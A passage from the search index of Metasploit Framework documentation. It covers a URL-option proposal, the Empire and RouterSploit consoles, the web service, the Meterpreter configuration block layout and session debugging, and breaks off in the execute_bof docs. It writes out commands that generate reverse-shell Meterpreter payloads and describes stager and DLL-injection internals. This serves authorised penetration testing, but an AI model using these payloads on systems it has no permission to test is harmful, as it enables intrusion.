    "content": "Metasploit console will now support setting a single RHOST_URL value. Note that this wouldn’t show as an option to the user, but would be used as a ‘macro’ to populate the existing datastore values: . set RHOST_URL https://a.site.com/foo Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS a.site.com yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:&amp;lt;path&amp;gt;' RPORT 443 yes The target port (TCP) SSL true no Negotiate SSL/TLS for outgoing connections TARGETURI /foo yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST a.site.com no HTTP server virtual host . After this convenience option has been set, it is now possible to use the normal workflow of msfconsole to set further options: . set RURL https://a.site.com/foo set TARGETURI /bar set SSL FALSE set RPORT 80 Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS a.site.com yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:&amp;lt;path&amp;gt;' RPORT 80 yes The target port (TCP) SSL true no Negotiate SSL/TLS for outgoing connections TARGETURI /bar yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST a.site.com no HTTP server virtual host . Similarly this functionality would set all options of the global store as expected: . 
setg RHOST_URL https://a.site.com/foo setg Global ====== Name Value ---- ----- RHOST a.site.com RPORT 443 SSL true TARGETURI /foo VHOST a.site.com . Advantages . | Simpler to reason about as an end user | Less complex to implement, and can be built upon the current Options/Datastore implementation with relative ease | As a user it’s now easy to configure one option | The user can directly copy/paste a URL from their browser into msfconsole to run a check module against | Helps to catch improperly set ports. For instance, setting the SSL option to true - but forgetting to update RPORT to 443 | Backwards compatible | The existing metadata/options remains intact for the user to view | . Disadvantages . | It is not possible to set multiple targets. However, this can still be implemented with resource scripts. | Harder to discover; we will have to add extra affordance for this - and make additional noise to help increase the awareness of this new functionality | Users may raise issues asking for the next obvious step of multiple targets | Future compatibility issues. If we decide to implement support for multiple independent targets, there’s some baggage introduced in needing to alias RURL to RURLS etc. | . Additional considerations . | How likely are individuals to actually scan against completely arbitrary endpoints with independent ports etc. in the real world? | There will be no changes to the SSL_VERSION option as part of this effort | When setting multiple targets, is a comma delimited string \", \" to separate targets the best approach? It’s technically possible that URLs copied from the browser contain this substring. Additional affordance may need to be added to ensure commas without trailing whitespace are flagged as a potential issue. | The naming of TARGETURI is unintuitive; perhaps it could be renamed to RPATH | The chosen implementation should ensure file support is not broken . 
| https://github.com/rapid7/metasploit-framework/pull/11497 | . | Consistency across module types, and external modules, will have to be ensured: . | https://github.com/rapid7/metasploit-framework/issues/13061 | . | Will database modules be impacted by this change? It is currently unclear. | Postgres natively supports connection strings and the notation is not novel: postgres://{user}:{password}@{hostname}:{port}/{database-name} | . | Will FTP modules be impacted by this change? It is currently unclear. | FTP URL syntax is described in RFC 1738, taking the form: ftp://[user[:password]@]host[:port]/url-path | . | Will SRVHOST be impacted by this change? This will remain the same, but could be changed. | SRVHOST - The local host to listen on. This must be an address on the local machine or 0.0.0.0 | SRVPORT 8080 - The local port to listen on. | . | Allowing multiple arbitrary targets with independent ports, protocols etc., is potentially a different development effort from allowing rhosts to support URL syntax. | . ",
    "url": "/docs/development/propsals/metasploit-url-support-proposal.html#3-support-setting-a-single-rhost_url",
    "relUrl": "/docs/development/propsals/metasploit-url-support-proposal.html#3-support-setting-a-single-rhost_url"
  },"600": {
    "doc": "Metasploit URL support proposal",
    "title": "Similar Efforts",
    "content": "RouterSploit . Routersploit is a Python exploitation framework for embedded devices. The interactive console allows the user to specify a TARGET option. This value can only be configured with a valid IPv4/IPv6 address: . rsf &amp;gt; use exploits/routers/2wire/ rsf (2Wire Gateway Auth Bypass) &amp;gt; show options Target options: Name Current settings Description ---- ---------------- ----------- ssl false SSL enabled: true/false target Target IPv4, IPv6 address: 192.168.1.1 port 80 Target HTTP port Module options: Name Current settings Description ---- ---------------- ----------- verbosity true Verbosity enabled: true/false . With a module that supports a configurable path: . rsf &amp;gt; use exploits/generic/shellshock rsf (Shellshock) &amp;gt; show options Target options: Name Current settings Description ---- ---------------- ----------- ssl false SSL enabled: true/false target Target IPv4 or IPv6 address port 80 Target HTTP port Module options: Name Current settings Description ---- ---------------- ----------- verbosity true Verbosity enabled: true/false path / Url path method GET HTTP method header User-Agent HTTP header injection point . Empire . Empire is a now retired post exploitation framework for windows. The interactive console provides both a Host configuration, as well as the ability to individually configure options: . (Empire) &amp;gt; listeners [!] No listeners currently active (Empire: listeners) &amp;gt; uselistener http (Empire: listeners/http) &amp;gt; info Name Required Value Description ---- -------- ------- ----------- Name True http Name for the listener. Host True http://192.168.246.234 Hostname/IP for staging. BindIP True 0.0.0.0 The IP to bind to on the control server. Port True Port for the listener. Launcher True powershell -noP -sta -w 1 -enc Launcher string. StagingKey True d6ca3fd0c3a3b462ff2b83436dda495e Staging key for initial agent negotiation. DefaultDelay True 5 Agent delay/reach back interval (in seconds). 
DefaultJitter True 0.0 Jitter in agent reachback interval (0.0-1.0). DefaultLostLimit True 60 Number of missed checkins before exiting DefaultProfile True /admin/get.php,/news.php,/login/ Default communication profile for the agent. process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko CertPath False Certificate path for https listeners. KillDate False Date for the listener to exit (MM/dd/yyyy). WorkingHours False Hours for the agent to operate (09:00-17:00). Headers True Server:Microsoft-IIS/7.5 Headers for the control server. Cookie False sTAZwcPKtawpT Custom Cookie Name StagerURI False URI for the stager. Must use /download/. Example: /download/stager.php UserAgent False default User-agent string to use for the staging request (default, none, or other). Proxy False default Proxy to use for request (default, none, or other). ProxyCreds False default Proxy credentials ([domain\\]username:password) to use for request (default, none, or other). SlackToken False Your SlackBot API token to communicate with your Slack instance. SlackChannel False #general The Slack channel or DM that notifications will be sent to. Setting the Host option configures both the Host option and the Port: . (Empire: listeners/http) > set Host http://10.10.14.31:443 (Empire: listeners/http) > info Name: HTTP[S] Category: client_server Authors: @harmj0y Description: Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach. HTTP[S] Options: Name Required Value Description ---- -------- ------- ----------- Name True http Name for the listener. Host True http://10.10.14.31:443 Hostname/IP for staging. BindIP True 0.0.0.0 The IP to bind to on the control server. Port True 443 Port for the listener. Launcher True powershell -noP -sta -w 1 -enc Launcher string. StagingKey True d6ca3fd0c3a3b462ff2b83436dda495e Staging key for initial agent negotiation. DefaultDelay True 5 Agent delay/reach back interval (in seconds). 
DefaultJitter True 0.0 Jitter in agent reachback interval (0.0-1.0). DefaultLostLimit True 60 Number of missed checkins before exiting DefaultProfile True /admin/get.php,/news.php,/login/ Default communication profile for the agent. process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko CertPath False Certificate path for https listeners. KillDate False Date for the listener to exit (MM/dd/yyyy). WorkingHours False Hours for the agent to operate (09:00-17:00). Headers True Server:Microsoft-IIS/7.5 Headers for the control server. Cookie False sTAZwcPKtawpT Custom Cookie Name StagerURI False URI for the stager. Must use /download/. Example: /download/stager.php UserAgent False default User-agent string to use for the staging request (default, none, or other). Proxy False default Proxy to use for request (default, none, or other). ProxyCreds False default Proxy credentials ([domain\\]username:password) to use for request (default, none, or other). SlackToken False Your SlackBot API token to communicate with your Slack instance. SlackChannel False #general The Slack channel or DM that notifications will be sent to. Likewise, updating the individual port will be reflected in the Host option: . (Empire: listeners/http) > set Port 1234 (Empire: listeners/http) > info Name: HTTP[S] Category: client_server Authors: @harmj0y Description: Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach. HTTP[S] Options: Name Required Value Description ---- -------- ------- ----------- Name True http Name for the listener. **Host True http://10.10.14.31:1234 Hostname/IP for staging.** BindIP True 0.0.0.0 The IP to bind to on the control server. **Port True 1234 Port for the listener.** . ",
    "url": "/docs/development/propsals/metasploit-url-support-proposal.html#similar-efforts",
    "relUrl": "/docs/development/propsals/metasploit-url-support-proposal.html#similar-efforts"
  },"601": {
    "doc": "Metasploit URL support proposal",
    "title": "Metasploit URL support proposal",
    "content": " ",
    "url": "/docs/development/propsals/metasploit-url-support-proposal.html",
    "relUrl": "/docs/development/propsals/metasploit-url-support-proposal.html"
  },"602": {
    "doc": "Metasploit Web Service",
    "title": "Managing the Web Service",
    "content": "Requirements . To use the web service you will need a PostgreSQL database to serve as the backend data store. The msfdb tool allows you to manage both the Metasploit Framework database and web service. If you are going to configure the database manually you can find more information on the Managing the Database page. Getting Started . Initialize the Database and Web Service . Execute msfdb init and respond to prompts during the interactive initialization. The script first creates and configures the database, then it configures the web service, and finally configures the local msfconsole with the new data service connection. msfdb . The msfdb tool allows you to manage both the Metasploit Framework database and web service components together or independently. If the --component option is not provided then the specified command will be executed for the database followed by the web service. This default mode of operation is useful when first setting up the database and web service. The component may be specified if you wish to make changes to a given component independent of the other. Usage: msfdb [options] &amp;lt;command&amp;gt; . | Options: . | Execute msfdb --help for the complete usage information | . | Commands: . | init - initialize the component | reinit - delete and reinitialize the component | delete - delete and stop the component | status - check component status | start - start the component | stop - stop the component | restart - restart the component | . | . Examples . | msfdb start - Start the database and web service | msfdb --component webservice stop - Stop the web service | msfdb --component webservice --address 0.0.0.0 start - Start the web service, listening on any host address | . Notes . | SSL is enabled by default and msfdb will generate a fake “snakeoil” SSL certificate during initialization using Rex::Socket::Ssl.ssl_generate_certificate if one is not provided. 
The generated SSL certificate uses a random common name (CN) which will not match your hostname, therefore, you will need to make appropriate accommodations when operating the web service with such a certificate. Please generate your own SSL certificate and key instead and supply those to msfdb using the --ssl-cert-file and --ssl-key-file options, and enable SSL verification by passing the option --no-ssl-disable-verify. | A simple verification that the web service is up and running can be performed using cURL: curl --insecure -H \"Accept: application/json\" -H \"Authorization: Bearer <token>\" https://localhost:5443/api/v1/msf/version . | . Accessing the API . The API account can be accessed with your preferred web browser by visiting https://<address>:<port>/api/v1/auth/account. If you want to change the API token for your account you can log in to the API account page and generate a new API token. You can find more information on the data models and various API endpoints by visiting the API Documentation at: https://<address>:<port>/api/v1/api-docs . ",
    "url": "/docs/using-metasploit/advanced/metasploit-web-service.html#managing-the-web-service",
    "relUrl": "/docs/using-metasploit/advanced/metasploit-web-service.html#managing-the-web-service"
  },"603": {
    "doc": "Metasploit Web Service",
    "title": "Utilizing the Data Service in msfconsole",
    "content": "Connecting . You can use the db_connect command to connect to the desired data service. When you successfully connect to a data service that connection will be saved in the Metasploit config file. You can provide a name with the -n option, otherwise one will be randomly generated. You can then use that name to reconnect to the data service at a later time. Please note that you can only be connected to one data service at a time. The db_disconnect command will need to be used before switching to a new data service. You can use db_status to see information about the currently connected data service. Usage: db_connect &amp;lt;options&amp;gt; &amp;lt;url&amp;gt; . | Options: . | -l,--list-services - List the available data services that have been previously saved. | -y,--yaml - Connect to the data service specified in the provided database.yml file. | -n,--name - Name used to store the connection. Providing an existing name will overwrite the settings for that connection. | -c,--cert - Certificate file matching the remote data server’s certificate. Needed when using self-signed SSL cert. | -t,--token - The API token used to authenticate to the remote data service. | --skip-verify - Skip validating authenticity of server’s certificate (NOT RECOMMENDED). | . | Examples: . | db_connect http://localhost:5443 - Connect to the Metasploit REST API instance at localhost running on port 5443 | db_connect -c ~/.msf4/msf-ws-cert.pem -t 72ce00fd9ab1a96970137e5a12faa12f38dcc4a9e42158bdd3ce7043c65f5ca37b862f3faf3630d2 https://localhost:5443 - Connect to the server running at localhost on port 5443 that has SSL and authentication enabled. | db_connect -l - List the data services that have been saved. | db_connect -n LA_server http://localhost:5443 - Connect to the data service running on localhost port 5443 and assign the name “LA_server” to the saved entry. | . | URL Formats . 
| HTTP - http://<host>:<port> | HTTPS - https://<host>:<port> | Postgres - <user>:<password>@<host>:<port>/<database name> | . | . Setting a Default Data Service . The db_save command can be used to save the currently connected data service as the default. Every time msfconsole starts up it will attempt to connect to that data service. You can always switch between data services if you have a default set; this will just determine which data service you are connected to when msfconsole is started. Usage: db_save . | Examples: . | db_connect http://localhost:5443 then db_save - Connect to the data service running on localhost port 5443 then set it as the default connection. | . | . Removing Saved Data Services . Saved data services can be removed using the db_remove command. This can be useful if the data service no longer exists at that location, or if you no longer want to keep a record of it around for fast connection. Usage: db_remove <name> . | Examples: . | db_remove LA_server - Remove the saved data service entry called “LA_server” | . | . Notes . There are a few pieces of information to keep in mind when using data services with Metasploit Framework. | Specifying the name of an existing saved data service connection will overwrite those settings. | A data service must already have an existing entry in the list of saved data services to be set as the default. Data services that were connected to using a database.yml file cannot be saved as default using this method. | A Postgres database connection is required before connecting to a remote data service. | The configuration from the database.yml will still be honored for the foreseeable future, but a saved default data service will take priority when it is present. 
| The saved data services are stored in the Metasploit config file, which is located at ~/.msf4/config by default. | . ",
    "url": "/docs/using-metasploit/advanced/metasploit-web-service.html#utilizing-the-data-service-in-msfconsole",
    "relUrl": "/docs/using-metasploit/advanced/metasploit-web-service.html#utilizing-the-data-service-in-msfconsole"
  },"604": {
    "doc": "Metasploit Web Service",
    "title": "Metasploit Web Service",
    "content": "The Metasploit web service allows interaction with Metasploit’s various data models through a REST API. ",
    "url": "/docs/using-metasploit/advanced/metasploit-web-service.html",
    "relUrl": "/docs/using-metasploit/advanced/metasploit-web-service.html"
  },"605": {
    "doc": "Configuration",
    "title": "On this page",
    "content": ". | How the configuration is found . | Loading configuration in Windows Meterpreter | Loading configuration in POSIX Meterpreter (Mettle) | . | Windows Meterpreter configuration block structure . | Session configuration block | Transport configuration block . | Common configuration values | TCP configuration values | HTTP/S configuration values | Transport configuration list | . | Extension configuration block | . | Configuration block overview | . Meterpreter has always needed to be configured on the fly so that it knows how to talk to Metasploit. For many years, this configuration management was achieved by hot-patching a copy of the metsrv DLL/binary using a simple “string replace” approach. This worked well enough to support a number of situations but restricted the flexibility of Meterpreter and its support for handling multiple transports. It wasn’t just transports that were locked down, but the ability to provide payloads that contained way more than the core Meterpreter (metsrv) itself. It was also not easy to pass other forms of information on the fly to the Meterpreter instance because the stagers were only able to pass in a copy of the active socket handle. Recent modifications to Meterpreter have done away with this old method and have replaced with a dynamic configuration block that can be used to alleviate these problems and provide the flexibility for other more interesting things down the track. This document contains information on the structure and layout of the new configuration block, along with how it is used by Meterpreter. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-configuration.html#on-this-page",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-configuration.html#on-this-page"
  },"606": {
    "doc": "Configuration",
    "title": "How the configuration is found",
    "content": "In the past, Meterpreter has required that the stager (or stage0 as some like to call it) pass in a handle to the active socket so that it can take over communications without creating a new socket (at least in the case of TCP connections). While this feature is still required, it doesn’t happen in the way that it used to. Instead, Meterpreter now requires that the stager pass in a pointer to the start of the configuration block. The configuration block can be anywhere in memory, so long as the memory region is marked as RWX. Loading configuration in Windows Meterpreter . Stage 1 of loading Windows Meterpreter now utilises a new loader, called meterpreter_loader (Win x86, Win x64), which does the following: . | Loads the metsrv DLL from disk. | Patches the DOS header of the DLL so that it contains executable shellcode that correctly initializes metsrv and calculates the location that points to the end of metsrv in memory. It also takes any existing socket value (found in edi or rdi depending on the architecture) and writes that directly to the configuration (more on this later). | Generates a configuration block and appends this to the metsrv binary. | . The result is that the payload has the following structure once it has been prepared: . +--------------+ | Patched DOS | header | +--------------+ | . metsrv dll . | +--------------+ | config block | +--------------+ . Loading configuration in POSIX Meterpreter (Mettle) . All of the configuration for the POSIX Meterpreter is able to be passed through command-line arguments to the payload. When generating a payload with a specific configuration, a simulated command line is patched into a static variable in the main startup code. Generate a payload and see ./mettle -h for a full description of available arguments. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-configuration.html#how-the-configuration-is-found",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-configuration.html#how-the-configuration-is-found"
  },"607": {
    "doc": "Configuration",
    "title": "Windows Meterpreter configuration block structure",
    "content": "In order to pass information to Meterpreter and not have it break, a known format of configuration is required. This format needs to be consistent on each invocation, much like you would expect with any configuration. In the case of binary Meterpreter (POSIX and Windows), this configuration block contains the following: . | One Session configuration block. | One or more Transport Configuration blocks, followed by a terminator. | One or more Extension configuration blocks, followed by a terminator. | . Each of these blocks is described in detail in the sections below. Session configuration block . The notion of a session configuration block is used to wrap up the following values: . | Socket handle - When Meterpreter is invoked with TCP communications, an active socket is already in use. This socket handle is intended to be reused by Meterpreter when metsrv executes. This socket handle is written to the configuration block on the fly by the loader. It is stored in the Session configuration block so that it has a known location. This value is always a 32-bit DWORD, even on 64-bit platforms. | Exit func - This value is a 32-bit DWORD value that identifies the method that should be used when terminating the Meterpreter session. This value is the equivalent of the Block API Hash that represents the function to be invoked. Meterpreter used to delegate the responsibility of handling this to the stager that had invoked it. Meterpreter no longer does this, instead, it handles the closing of the Meterpreter session by itself, and hence the chosen method for termination must be made known in the configuration. | Session expiry value - This is a 32-bit DWORD that contains the number of seconds that the Meterpreter session should last for. While Meterpreter is running, this value is continually checked, and if the session expiry time is reached, then Meterpreter shuts itself down. For more information, please read Meterpreter Timeout Control. 
| UUID - This is a 16-byte value that represents a payload UUID. A UUID is a new concept that has come to Metasploit with a goal of tracking payload type and origin, and validating that sessions received by Metasploit are intended for use by the current installation. For more information, please read Payload UUID. | . The layout of this block in memory looks like this: . +--------------+ |Socket Handle | +--------------+ | Exit func | +--------------+ |Session Expiry| +--------------+ | | UUID | | | +--------------+ | <- 4 bytes ->| . With this structure in place, Meterpreter knows that the session configuration block is exactly 28 bytes in size. The Session configuration block description can be found in the Meterpreter source. Transport configuration block . The Transport configuration block is a term used to refer to the group of transport configurations that are present in the payload. Meterpreter now supports multiple transports, and so the configuration should support multiple transports too. There are two main issues when dealing with transport configurations: . | The configuration should allow for many transport configurations to be specified. | The configuration should allow for each transport to be of a different type and size. | . Meterpreter’s current transport implementations provide two main “classes” of transport, those being HTTP(S) and TCP. Each of these transport classes requires different configuration values, as well as common values, in order to function. Common configuration values . The values that are common to both HTTP(S) and TCP transports are: . | URL - This value is a meta-description of the transport and is used not only as a configuration element for the transport itself but also as a way of determining what type of transport this block represents. The field is a total of 512 characters (Windows Meterpreter uses wchar_t, while POSIX Meterpreter uses char). 
Transport types are specified by the scheme element in the URL, and the body of the URL specifies key information such as host and port information. Meterpreter inspects this to determine what type of transport block is in use, and hence from there is able to determine the size of the block. Valid values look like the following: . | tcp://<host>:<port> - indicates that this payload is a reverse IPv4 TCP connection. | tcp6://<host>:<port>?<scope> - indicates that this payload is a reverse IPv6 TCP connection. | tcp://:<port> - indicates that this payload is a bind payload listening on the specified port (note that no host is specified). | http://<host>:<port>/<uri> - indicates that this payload is an HTTP connection (can only be reverse). | https://<host>:<port>/<uri> - indicates that this payload is an HTTPS connection (can only be reverse). | . | Communications expiry - This value is another 32-bit DWORD value that represents the number of seconds to wait between successful packet/receive calls. For more information, please read the Timeout documentation (link coming soon). | Retry total - This value is a 32-bit DWORD value that represents the number of seconds that Meterpreter should continue to attempt to reconnect on this transport before giving up. For more information, please read the Timeout documentation (link coming soon). | Retry wait - This value is a 32-bit DWORD value that represents the number of seconds between each attempt that Meterpreter makes to reconnect on this transport. For more information, please read the Timeout documentation (link coming soon). | . The layout of this block in memory looks like the following: . +--------------+ | | URL | . 512 characters worth . (POSIX -> ASCII -> char) . (Windows -> wide char -> wchar_t) . 
| +--------------+ | Comms T/O | +--------------+ | Retry Total | +--------------+ | Retry Wait | +--------------+ | <- 4 bytes ->| . The common transport configuration block description can be found in the Meterpreter source. TCP configuration values . At this time, there are no TCP-specific configuration values, as the common configuration block caters for all of the needs of TCP transports. This may change down the track. HTTP/S configuration values . HTTP and HTTPS connections have a number of extra configuration values that are required in order to make them function correctly in various environments. Those values are: . | Proxy host - In environments where proxies are required to be set manually, this field contains the detail of the proxy to use. The field is 128 characters in size (wchar_t only, given that we don’t yet have HTTP/S transport in POSIX), and can be in one of the following formats: . | http://<proxy ip>:<proxy port> in the case of HTTP proxies. | socks=<socks ip>:<sock port> in the case of socks proxies. | . | Proxy user name - Some proxies require authentication. In such cases, this value contains the username that should be used to authenticate with the given proxy. This field is 64 characters in size (wchar_t). | Proxy password - This value will accompany the user name field in the case where proxy authentication is required. It contains the password used to authenticate with the proxy and is also 64 characters in size (wchar_t). | User agent string - Customisable user agent string. This changes the user agent that is used when HTTP/S requests are made to Metasploit. This field is 256 characters in size (wchar_t). | Expected SSL certificate hash - Meterpreter has the capability of validating the SSL certificate that Metasploit presents when using HTTPS. This value contains the 20-byte SHA1 hash of the expected certificate. 
For more information, please read the SSL certificate validation documentation (link coming soon). | . All values that are shown above need to be specified in the configuration, including SSL certificate validation for plain HTTP connections. Values that are not used should be zeroed out. The structure of the HTTP/S configuration is as follows. +--------------+ | | Proxy host | . 128 characters worth (wchar_t) | +--------------+ | | Proxy user | . 64 characters worth (wchar_t) | +--------------+ | | Proxy pass | . 64 characters worth (wchar_t) | +--------------+ | | User agent | . 256 characters worth (wchar_t) | +--------------+ | | SSL cert | SHA1 hash | | | +--------------+ | <- 4 bytes ->| . The HTTP/S transport configuration block description can be found in the Meterpreter source. Transport configuration list . As already mentioned, more than one of these transport configuration blocks can be specified. In order to facilitate this, Meterpreter needs to know when the “list” of transports has ended. Using the URL, Meterpreter can determine the size of the block and can move to the next block, depending on the type that is discovered. As soon as Meterpreter detects a transport configuration URL value that has a string length of zero, for example, a single NULL ASCII char in POSIX and a single NULL multi-byte char in Windows, it assumes that the transport list has been terminated. The byte immediately following this is deemed to be the start of the Extension configuration, which is documented in the next section. Extension configuration block . The extension configuration block is designed to allow Meterpreter payloads to contain any extra extensions that the user wants to bundle in. The goal is to provide the ability to have Stageless payloads (link coming soon), and to provide the means for sharing of extensions during migration (though this hasn’t been implemented yet). 
Each of the extensions must have been compiled with Reflective DLL Injection support, as this is the mechanism that is used to load the extensions when Meterpreter starts. For more information on this facility, please see the Stageless payloads (link coming soon) documentation. The extension configuration block also functions as a “list” to allow for an arbitrary number of extensions to be included. Each extension entry needs to contain: . | Size - This is the exact size, in bytes, of the extension DLL itself. The value is a 32-bit DWORD. | Extension binary - This is the full binary directly copied from the DLL. This value needs to be exactly the same length as what is specified in the Size field. | . When loading the extensions from the configuration, Meterpreter will continue to parse entries until it finds a size value of 0. At this point, Meterpreter assumes it has reached the end of the extension list and will stop parsing. The structure is simply laid out like the following: . +--------------+ | Ext. Size | +--------------+ | Ext. content | +--------------+ | NULL term. | (4 bytes) | +--------------+ . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-configuration.html#windows-meterpreter-configuration-block-structure",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-configuration.html#windows-meterpreter-configuration-block-structure"
  },"608": {
    "doc": "Configuration",
    "title": "Configuration block overview",
    "content": "To summarise, the following shows the layout of a full configuration: . +--------------+ |Socket Handle | +--------------+ | Exit func | +--------------+ |Session Expiry| +--------------+ | | UUID | | | +--------------+ | Transport 1 | tcp://... | . | +--------------+ | Comms T/O | +--------------+ | Retry Total | +--------------+ | Retry Wait | +--------------+ | Transport 2 | http://... | . | +--------------+ | Comms T/O | +--------------+ | Retry Total | +--------------+ | Retry Wait | +--------------+ | | Proxy host | | +--------------+ | | Proxy user | | +--------------+ | | Proxy pass | | +--------------+ | | User agent | | +--------------+ | | SSL cert | SHA1 hash | | +--------------+ | NULL term. |(1 or 2 bytes)| +--------------+ | Ext 1. Size | +--------------+ |Ext 1. content| +--------------+ | Ext 2. Size | +--------------+ |Ext 2. content| +--------------+ | NULL term. | +--------------+ . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-configuration.html#configuration-block-overview",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-configuration.html#configuration-block-overview"
  },"609": {
    "doc": "Configuration",
    "title": "Configuration",
    "content": " ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-configuration.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-configuration.html"
  },"610": {
    "doc": "Debugging Meterpreter Sessions",
    "title": "Log Meterpreter TLV Packets",
    "content": "This can be enabled for any Meterpreter session, and does not require a debug Metasploit build: . msf6 > setg SessionTlvLogging true SessionTlvLogging => true . Allowed values: . | setg SessionTlvLogging true - Enable network logging, defaulting to console | setg SessionTlvLogging false - Disable all network logging | setg SessionTlvLogging console - Log to the current msfconsole instance | setg SessionTlvLogging file:/tmp/session.txt - Write the network traffic logs to an arbitrary file | . Example output: . meterpreter > getenv USER SEND: #<Rex::Post::Meterpreter::Packet type=Request tlvs=[ #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID meta=INT value=1052 command=stdapi_sys_config_getenv> #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID meta=STRING value=\"73717259684850511890564936718272\"> #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE meta=STRING value=\"USER\"> ]> RECV: #<Rex::Post::Meterpreter::Packet type=Response tlvs=[ #<Rex::Post::Meterpreter::Tlv type=UUID meta=RAW value=\"Q\\xE63_onC\\x9E\\xD71\\xDE3\\xB5Q\\xE24\"> #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID meta=INT value=1052 command=stdapi_sys_config_getenv> #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID meta=STRING value=\"73717259684850511890564936718272\"> #<Rex::Post::Meterpreter::Tlv type=RESULT meta=INT value=0> #<Rex::Post::Meterpreter::GroupTlv type=ENV_GROUP tlvs=[ #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE meta=STRING value=\"USER\"> #<Rex::Post::Meterpreter::Tlv type=ENV_VALUE meta=STRING value=\"demo_user\"> ]> ]> Environment Variables ===================== Variable Value -------- ----- USER demo_user . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html#log-meterpreter-tlv-packets",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html#log-meterpreter-tlv-packets"
  },"611": {
    "doc": "Debugging Meterpreter Sessions",
    "title": "Meterpreter debug builds",
    "content": "The following options can be specified when generating Meterpreter payloads: . | MeterpreterDebugBuild - When set to true, the generated Meterpreter payload will have additional logging present | MeterpreterDebugLogging - Configure the logging mode. This currently only allows writing to a file on the remote host. Requires MeterpreterDebugBuild to be set to true. Example value: setg MeterpreterDebugLogging rpath:/tmp/meterpreter_log.txt | MeterpreterTryToFork - When set to true the Meterpreter payload will try to fork from the currently running process. Setting to false is useful to see any stdout logging that occurs | . The debug build will have additional log statements, which can be easily detected. These debug builds are useful for scenarios where A/V is not running, in local labs for learning purposes, or raising Metasploit issue reports etc. Python . use payload/python/meterpreter_reverse_tcp generate -o shell.py -f raw lhost=127.0.0.1 MeterpreterDebugBuild=true MeterpreterTryToFork=false to_handler python3 shell.py . PHP . use payload/php/meterpreter_reverse_http generate -o shell.php -f raw lhost=127.0.0.1 MeterpreterDebugBuild=true to_handler php shell_http.php . Windows . use windows/x64/meterpreter_reverse_tcp generate -f exe -o shell.exe MeterpreterDebugBuild=true MeterpreterDebugLogging='rpath:C:/Windows/Temp/foo.txt' to_handler . Mac . use osx/x64/meterpreter_reverse_tcp generate -f macho -o shell MeterpreterDebugbuild=true MeterpreterDebugLogging='rpath:/tmp/foo.txt' to_handler . Linux . use linux/x64/meterpreter_reverse_tcp generate -f elf -o shell MeterpreterDebugbuild=true MeterpreterDebugLogging='rpath:/tmp/foo.txt' to_handler . Java . Functionality not supported . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html#meterpreter-debug-builds",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html#meterpreter-debug-builds"
  },"612": {
    "doc": "Debugging Meterpreter Sessions",
    "title": "Debugging Meterpreter Sessions",
    "content": "There are currently two main ways to debug Meterpreter sessions: . | Log all networking requests between msfconsole and Meterpreter, i.e. TLV Packets | Generate a custom Meterpreter debug build with extra logging present | . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html"
  },"613": {
    "doc": "ExecuteBof Command",
    "title": "Execution Environment",
    "content": "Warning: The execution environment is shared with the Meterpreter process. If there is an exception or the BOF crashes, the Meterpreter session will die. It is suggested that users invoke this functionality through a dedicated session to avoid losing access altogether. The loader and execution environment are provided by trustedsec/COFFLoader. The extension is therefore subject to the same limitations. The following functions are unavailable: . | BeaconDataPtr | BeaconUseToken1 | BeaconRevertToken1 | BeaconIsAdmin | BeaconInjectProcess | BeaconInjectTemporaryProcess | . 1 The token functions are defined and present, but will only affect the execution of the BOF and not the Meterpreter runtime environment. Currently, there is only one output stream. All output data processed by BeaconOutput and BeaconPrintf is combined into that stream. BOFs should not use this for outputting binary data. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#execution-environment",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#execution-environment"
  },"614": {
    "doc": "ExecuteBof Command",
    "title": "Usage",
    "content": "The bofloader extension provides exactly one command, through which all of the provided functionality is accessed. execute_bof </path/to/bof_file> [Options] -- [BOF Arguments] . | -c / --compile – Compile the input file (requires mingw). | -e / --entry – The entry point (default: go). | -f / --format-string – Argument format-string. See details below. | . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#usage",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#usage"
  },"615": {
    "doc": "ExecuteBof Command",
    "title": "Compile",
